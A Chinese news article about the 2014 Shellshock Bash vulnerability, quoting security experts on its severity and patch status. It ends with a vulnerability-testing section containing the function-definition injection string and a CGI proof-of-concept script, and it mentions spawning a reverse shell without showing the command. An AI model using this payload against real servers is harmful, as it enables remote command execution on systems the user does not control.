北京時間9月25日消息,Linux用戶今天又得到了一個“驚喜”!Red Hat安全團隊在 Linux 中廣泛使用的Bash shell中發現了一個隱晦而危險的安全漏洞。該漏洞被稱為“Bash Bug”或“Shellshock”。
當用戶正常訪問,該漏洞允許攻擊者的代碼像在Shell中一樣執行,這就為各種各樣的攻擊打開了方便之門。而且,更糟糕的是,該漏洞已經在Linux中存在很長時間了,所以修補某個Linux機器很容易,但是要全部修補,幾乎不可能實現。
Red Hat和Fedora已經發布了針對該漏洞的修補程序。該漏洞也會影響OS X,不過蘋果公司尚未發布正式的修補程序。
這個Bash漏洞可能比Heartbleed更危險。
— — Robert Graham (@ErrataRob) 2014 年 9 月 24 日
Red Hat的Robert David Graham比較了該漏洞和Heartbleed,發現前者分布更廣泛,有可能對系統安全帶來長期影響。Graham在一篇博客文章中寫道:“有大量的軟件以某種方式與Shell交互,我們沒有辦法列舉出受該漏洞影響的所有軟件。”據The Verge報道,Berkeley ICSI的研究員Nicholas Weaver也同意這個說法:“它很隱晦、很可怕,并且會伴隨我們多年。”
網絡安全公司Rapid7工程部經理Tod Beardsley警告稱,Bash漏洞的嚴重級別為“10”,這意味著它對用戶電腦的威脅最大。Bash漏洞的利用復雜度級別為“低”,意味著黑客可以相對輕松地利用它發動攻擊。
另外,網絡安全公司Trail of Bits的CEO Dan Guido表示,“Heartbleed”漏洞能夠允許黑客監控用戶電腦,但不會取(www.111cn.net)得控制權。而利用Bash漏洞的方法也更簡單——只需要剪切和粘貼一行代碼即可。
據稱,谷歌安全研究員Tavis Ormandy在Twitter上表示,Linux系統提供商推出的補丁似乎“并不完整”,這引發了幾位安全專家的擔憂。(責編/單明珠)
本文轉載自Linux中國,原文出自The Verge,部分內容有刪改。
目前,360安全中心應發布“Bash”漏洞測試方法,同時提醒廣大網站和企業及時更新服務務器安全補丁,避免造成重大危險。“Bash”漏洞測試方法1)、本地測試env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
2)、遠程測試首先用BASH寫一個CGI root@kali:/usr/lib/cgi-bin# cat bug.sh #!/bin/bashecho "Content-type: text/html"echo ""echo '<html>'echo '<head>'echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'echo '<title>PoC</title>'echo '</head>'echo '<body>'echo '<PRe>'/usr/bin/envecho '</pre>'echo '</body>'echo '</html>'exit 0放到/usr/lib/cgi-bin里,然后用curl訪問
能打印出環境變量了。說明能夠正常訪問了。下面反彈一個SHELL
訪問看結果:from:http://www.111cn.net/sys/linux/67041.htm
新聞熱點
疑難解答